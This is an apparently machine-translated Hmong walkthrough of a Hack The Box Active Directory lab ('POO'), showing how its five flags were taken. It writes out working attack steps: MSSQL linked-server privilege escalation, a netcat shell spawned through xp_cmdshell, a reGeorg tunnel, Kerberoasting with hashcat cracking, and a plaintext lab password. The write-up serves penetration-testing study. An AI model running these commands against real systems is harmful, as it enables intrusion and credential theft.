Nyob rau hauv tsab xov xwm no peb yuav txheeb xyuas cov nqe lus ntawm tsis yog lub tshuab xwb, tab sis tag nrho cov mini-lab los ntawm qhov chaw
Raws li tau hais hauv cov lus piav qhia, POO yog tsim los sim cov txuj ci ntawm txhua theem ntawm kev tawm tsam hauv ib puag ncig Active Directory me. Lub hom phiaj yog los cuam tshuam tus tswv tsev siv tau, nce cov cai, thiab thaum kawg cuam tshuam tag nrho cov npe thaum sau 5 tus chij.
Kev txuas mus rau chav kuaj yog los ntawm VPN. Nws raug nquahu kom tsis txhob txuas los ntawm lub khoos phis tawj ua haujlwm lossis los ntawm tus tswv tsev uas muaj cov ntaub ntawv tseem ceeb rau koj, txij li thaum koj xaus rau ntawm lub network ntiag tug nrog cov neeg paub txog qee yam hauv kev ruaj ntseg cov ntaub ntawv :)
cov ntaub ntawv koom haum
Yog li koj tuaj yeem paub txog cov ntawv tshiab, software thiab lwm yam ntaub ntawv, kuv tsim
Txhua yam ntaub ntawv yog muab rau kev kawm nkaus xwb. Tus sau ntawm daim ntawv no xav tias tsis muaj lub luag haujlwm rau kev puas tsuaj rau leej twg los ntawm kev siv cov kev paub thiab cov txheej txheem tau txais los ntawm kev kawm cov ntaub ntawv no.
Intro
Qhov kev ua si kawg no muaj ob lub tshuab, thiab muaj 5 tus chij.
Cov lus piav qhia thiab chaw nyob ntawm tus tswv tsev muaj kuj tau muab.
Cia peb pib!
Recon chij
Lub tshuab no muaj qhov chaw nyob IP ntawm 10.13.38.11, uas kuv ntxiv rau /etc/hosts.
10.13.38.11 poo.htb
Ua ntej ntawm tag nrho cov, peb luam theej duab qhib ports. Txij li thaum scanning tag nrho cov ports nrog nmap yuav siv sij hawm ntev, kuv yuav xub ua qhov no siv masscan. Peb luam theej duab tag nrho TCP thiab UDP chaw nres nkoj los ntawm tun0 interface ntawm qhov ceev ntawm 500 pob ntawv ib ob.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
Tam sim no, kom tau txais cov ncauj lus kom ntxaws ntxiv txog cov kev pabcuam uas khiav ntawm cov chaw nres nkoj, cia peb khiav lub scan nrog qhov kev xaiv -A.
nmap -A poo.htb -p80,1433
Yog li peb muaj IIS thiab MSSQL cov kev pabcuam. Hauv qhov no, peb yuav pom lub npe DNS tiag tiag ntawm lub npe thiab lub computer. Ntawm lub vev xaib server peb tau txais tos los ntawm IIS home page.
Cia peb mus dhau ntawm cov npe. Kuv siv gobuster rau qhov no. Hauv qhov tsis muaj peb qhia cov xov tooj 128 (-t), URL (-u), phau ntawv txhais lus (-w) thiab txuas ntxiv uas txaus siab rau peb (-x).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
Qhov no muab rau peb HTTP authentication rau /admin directory, nrog rau cov kev pab cuam desktop siv tau .DS_Store. .DS_Store yog cov ntaub ntawv uas khaws cov kev cai rau ib lub nplaub tshev, xws li cov npe ntawm cov ntaub ntawv, icon qhov chaw, thiab cov duab tom qab xaiv. Cov ntaub ntawv zoo li no tuaj yeem xaus rau hauv lub vev xaib server cov npe ntawm cov neeg tsim tawm lub vev xaib. Ua li no peb tau txais cov ntaub ntawv hais txog cov ntsiab lus ntawm phau ntawv teev npe. Rau qhov no koj tuaj yeem siv
python3 dsstore_crawler.py -i http://poo.htb/
Peb tau txais cov ntsiab lus ntawm daim ntawv teev npe. Qhov nthuav tshaj plaws ntawm no yog /dev directory, los ntawm qhov uas peb tuaj yeem saib cov ntaub ntawv thiab db hauv ob ceg. Tab sis peb tuaj yeem siv thawj 6 tus cim ntawm cov ntaub ntawv thiab cov npe npe yog tias qhov kev pabcuam muaj kev cuam tshuam rau IIS ShortName. Koj tuaj yeem tshawb xyuas qhov tsis zoo no siv
Thiab peb pom ib cov ntawv nyeem uas pib nrog "poo_co". Tsis paub yuav ua li cas ntxiv, Kuv tsuas xaiv tag nrho cov lus pib nrog "co" los ntawm phau ntawv txhais lus.
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
Thiab peb yuav txheeb nws tawm siv wfuzz.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
Thiab peb nrhiav tau cov lus zoo! Peb saib cov ntaub ntawv no, txuag cov ntaub ntawv pov thawj (kev txiav txim los ntawm DBNAME parameter, lawv yog los ntawm MSSQL).
Peb surrender tus chij thiab peb nce 20%.
Huh chij
Peb txuas rau MSSQL, Kuv siv DBeaver.
Peb tsis pom dab tsi nthuav hauv cov ntaub ntawv no, cia peb tsim SQL Editor thiab xyuas seb cov neeg siv muaj dab tsi.
SELECT name FROM master..syslogins;
Peb muaj ob tus neeg siv. Cia peb tshawb xyuas peb cov cai.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
Yog li ntawd, tsis muaj cai. Cia peb saib cov servers txuas, kuv tau sau txog cov txheej txheem no kom ntxaws
SELECT * FROM master..sysservers;
Nov yog qhov peb pom lwm tus SQL Server. Cia peb sim ua kom tiav cov lus txib ntawm lub server no siv openquery().
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
Thiab peb tseem tuaj yeem tsim cov ntoo nug.
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
Lub ntsiab lus yog tias thaum peb thov rau ib tus neeg rau zaub mov txuas, qhov kev thov raug ua tiav hauv cov ntsiab lus ntawm lwm tus neeg siv! Cia peb pom nyob rau hauv cov ntsiab lus ntawm cov neeg siv twg peb tab tom ua haujlwm ntawm lub server txuas.
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
Tam sim no cia peb pom nyob rau hauv dab tsi cov ntsiab lus kev thov yog tsim los ntawm tus neeg rau zaub mov txuas rau peb!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
Yog li nws yog DBO ntsiab lus uas yuav tsum muaj tag nrho cov cai. Cia peb tshawb xyuas cov cai nyob rau hauv rooj plaub ntawm kev thov los ntawm lub server txuas.
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
Raws li koj tau pom, peb muaj tag nrho cov cai! Wb tsim peb tus kheej admin zoo li no. Tab sis lawv tsis tso cai los ntawm kev qhib kev nug, cia peb ua nws los ntawm EXECUTE AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
Thiab tam sim no peb txuas nrog cov ntaub ntawv pov thawj ntawm tus neeg siv tshiab, peb soj ntsuam tus chij tshiab database.
Peb muab tus chij no thiab txav mus ntxiv.
BackTrack chij
Cia peb tau txais lub plhaub siv MSSQL, Kuv siv mssqlclient los ntawm pob impacket.
mssqlclient.py ralf:[email protected] -db POO_PUBLIC
Peb yuav tsum tau txais cov passwords, thiab thawj qhov uas peb tau ntsib yog lub vev xaib. Yog li, peb xav tau lub web server config (nws tsis tuaj yeem tawm ntawm lub plhaub yooj yim, pom meej tias lub firewall tab tom khiav).
Tab sis kev nkag tau raug tsis kam lees. Txawm hais tias peb tuaj yeem nyeem cov ntaub ntawv los ntawm MSSQL, peb tsuas yog xav paub seb cov lus programming tau teeb tsa li cas. Thiab hauv MSSQL directory peb pom tias muaj Python.
Tom qab ntawd tsis muaj teeb meem nyeem cov ntaub ntawv web.config.
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"
Nrog cov ntawv pov thawj pom, mus rau /admin thiab coj tus chij.
Fotohold chij
Qhov tseeb, muaj qee qhov tsis yooj yim los ntawm kev siv firewall, tab sis saib los ntawm kev teeb tsa network, peb pom tias IPv6 kuj tseem siv tau!
Cia peb ntxiv qhov chaw nyob no rau /etc/hosts.
dead:babe::1001 poo6.htb
Cia peb txheeb xyuas tus tswv tsev dua, tab sis siv IPv6 raws tu qauv.
Thiab qhov kev pabcuam WinRM muaj ntau dua IPv6. Cia peb txuas nrog cov ntawv pov thawj pom.
Muaj ib tug chij ntawm lub desktop, peb muab nws dua.
P00ned chij
Tom qab ua kev soj ntsuam ntawm tus tswv tsev siv
setspn.exe -T intranet.poo -Q */*
Cia peb khiav cov lus txib ntawm MSSQL.
Siv cov qauv no, peb tau txais SPN ntawm cov neeg siv p00_hr thiab p00_adm, uas txhais tau hais tias lawv muaj kev cuam tshuam rau kev tawm tsam xws li Kerberoasting. Hauv luv luv, peb tuaj yeem tau txais lawv tus password hashes.
Ua ntej koj yuav tsum tau txais lub plhaub ruaj khov ua tus neeg siv MSSQL. Tab sis txij li thaum peb txwv tsis pub nkag mus, peb muaj kev sib txuas lus nrog tus tswv tsev tsuas yog los ntawm cov chaw nres nkoj 80 thiab 1433. Tab sis nws muaj peev xwm ua tau qhov kev tsheb khiav los ntawm qhov chaw nres nkoj 80! Rau qhov no peb yuav siv
Tab sis thaum peb sim nkag mus rau nws, peb tau txais qhov yuam kev 404, qhov no txhais tau tias *.aspx cov ntaub ntawv tsis raug tua. Txhawm rau kom cov ntaub ntawv nrog cov kev txuas ntxiv no raug tua, nruab ASP.NET 4.5 raws li hauv qab no.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
Thiab tam sim no, thaum peb nkag mus rau tunnel.aspx, peb tau txais cov lus teb tias txhua yam yog npaj mus.
Cia peb pib tus neeg siv khoom ib feem ntawm daim ntawv thov, uas yuav cuam tshuam kev khiav tsheb. Peb yuav xa tag nrho cov tsheb khiav los ntawm chaw nres nkoj 5432 mus rau lub server.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
Thiab peb siv proxychains xa cov tsheb khiav ntawm txhua daim ntawv thov los ntawm peb lub npe. Cia peb ntxiv cov npe no rau cov ntaub ntawv teeb tsa /etc/proxychains.conf.
Tam sim no cia peb upload qhov program rau lub server
Tam sim no peb tso tus mloog ntawm MSSQL.
xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321
Thiab peb txuas los ntawm peb lub npe.
proxychains rlwrap nc poo.htb 4321
Thiab cia peb tau txais cov hashes.
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt
Tom ntej no koj yuav tsum rov hais dua cov hashs. Txij li cov phau ntawv txhais lus rockyou tsis muaj cov passwords no, kuv siv tag nrho cov passwords phau ntawv txhais lus muab rau hauv Seclists. Rau kev tshawb nrhiav peb siv hashcat.
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
Thiab peb pom ob tus passwords, thawj zaug hauv phau ntawv txhais lus dutch_passwordlist.txt, thiab qhov thib ob hauv Keyboard-Combinations.txt.
Thiab yog li peb muaj peb tus neeg siv, cia peb mus rau tus tswj hwm tus kheej. Ua ntej peb nrhiav nws qhov chaw nyob.
Zoo heev, peb pom qhov chaw nyob IP ntawm tus tswj hwm sau npe. Cia wb mus saib tag nrho cov neeg siv ntawm qhov sau npe, nrog rau qhov twg ntawm lawv yog tus thawj coj. Txhawm rau rub tawm tsab ntawv kom tau txais cov ntaub ntawv PowerView.ps1. Tom qab ntawd peb yuav txuas nrog kev siv kev phem-winrm, qhia meej cov npe nrog cov ntawv hauv -s parameter. Thiab tom qab ntawd peb tsuas yog thauj cov ntawv PowerView.
Tam sim no peb tau nkag mus rau tag nrho nws cov haujlwm. Tus neeg siv p00_adm zoo li tus neeg siv muaj cai, yog li peb yuav ua haujlwm hauv nws cov ntsiab lus. Cia peb tsim cov khoom PSCredential rau tus neeg siv no.
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
Tam sim no tag nrho cov lus txib Powershell qhov twg peb teev Creds yuav raug tua li p00_adm. Cia peb tso saib cov npe ntawm cov neeg siv thiab AdminCount tus cwj pwm.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
Thiab yog li ntawd, peb cov neeg siv tau muaj cai tiag tiag. Cia peb saib seb nws nyob hauv pab pawg twg.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
Thaum kawg peb paub tseeb tias tus neeg siv yog tus thawj tswj hwm sau npe. Qhov no ua rau nws muaj cai nkag mus rau tus tswj hwm tus lej nyob deb. Wb sim nkag mus rau ntawm WinRM siv peb lub qhov. Kuv tsis meej pem los ntawm qhov yuam kev uas tsim los ntawm reGeorg thaum siv kev phem-winrm.
Tom qab ntawd cia peb siv lwm tus, yooj yim dua,
Peb sim txuas, thiab peb nyob hauv qhov system.
Tab sis tsis muaj chij. Tom qab ntawd saib cov neeg siv thiab xyuas cov desktops.
Peb pom tus chij ntawm mr3ks thiab lub chaw soj nstuam yog 100% ua tiav.
Yog tag nrho. Raws li kev tawm tswv yim, thov tawm tswv yim seb koj puas tau kawm dab tsi tshiab los ntawm kab lus no thiab seb nws puas muaj txiaj ntsig rau koj.
Koj tuaj yeem koom nrog peb ntawm
Tau qhov twg los: www.hab.com